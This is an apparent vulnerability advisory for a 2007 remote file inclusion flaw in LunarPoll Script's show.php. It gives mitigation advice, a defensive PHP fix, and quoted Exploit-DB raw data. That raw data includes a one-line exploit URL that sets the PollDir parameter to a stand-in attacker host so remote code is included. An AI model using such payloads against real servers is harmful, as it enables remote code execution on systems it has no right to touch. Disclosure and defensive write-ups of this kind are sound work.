Vendor: LunarPoll Script
By: Unknown
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: LunarPoll Script
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

LunarPoll Script Remote File Inclusion Vulnerability

The LunarPoll script is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by injecting a malicious URL in the 'PollDir' parameter of the 'show.php' script, leading to the inclusion of arbitrary remote files.

Mitigation:

The vendor should release a patch to fix the remote file inclusion vulnerability. In the meantime, users are advised to restrict access to the 'show.php' script and sanitize user input to prevent malicious URL injections.
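
One way to apply the input-handling advice above to the two require_once lines quoted in the advisory, as an added example that is not LunarPoll's or the vendor's code. Assumptions: $PollDir reaches show.php through register_globals, show.php sits in the poll's root directory, and POLL_DIR and poll_include_path() are hypothetical names.

```php
<?php
// Added example, not LunarPoll's own code. Requires PHP 7+ for type hints.
//
// Vulnerable pattern quoted in the advisory: show.php never assigns $PollDir,
// so (assumption) register_globals fills it from the query string:
//   require_once($PollDir.'/includes/functions.php');

// 1. Treat any request-supplied PollDir as hostile: log it and stop.
foreach ([$_GET, $_POST, $_COOKIE] as $source) {
    if (array_key_exists('PollDir', $source)) {
        error_log('show.php: rejected request-supplied PollDir from '
            . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
        http_response_code(400);
        exit('Bad request');
    }
}

// 2. Fix the base directory server-side so the request cannot influence it.
// Assumption: show.php sits in the poll's root directory.
define('POLL_DIR', realpath(__DIR__));

// 3. Resolve every include below POLL_DIR. poll_include_path() is a
// hypothetical helper name. realpath() returns false for URLs and for
// missing files, so neither can reach require_once.
function poll_include_path(string $relative): string
{
    $path = realpath(POLL_DIR . DIRECTORY_SEPARATOR . $relative);
    $prefix = POLL_DIR . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        http_response_code(500);
        exit('Include path rejected');
    }
    return $path;
}

require_once poll_include_path('includes/functions.php');
require_once poll_include_path('includes/IO.php');
```

Independently of the code change, keep allow_url_include set to Off in php.ini, and register_globals set to Off on PHP versions that still have it.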

Exploit-DB raw data:

-------------------------------------------------------------------------------------------------------------------

AYYILDIZ.ORG PreSents...


Script:LunarPoll
Script Download: dexxaboy.com/scripts/lunarpoll/download/

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

Code:
require_once($PollDir.'/includes/functions.php');
require_once($PollDir.'/includes/IO.php');

-------------------------------------------------------------------------------------------------------------------

Exploit:  show.php?PollDir=http://attacker.txt?

-------------------------------------------------------------------------------------------------------------------

Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR
Special Tnx: AYYILDIZ.ORG

# milw0rm.com [2007-01-12]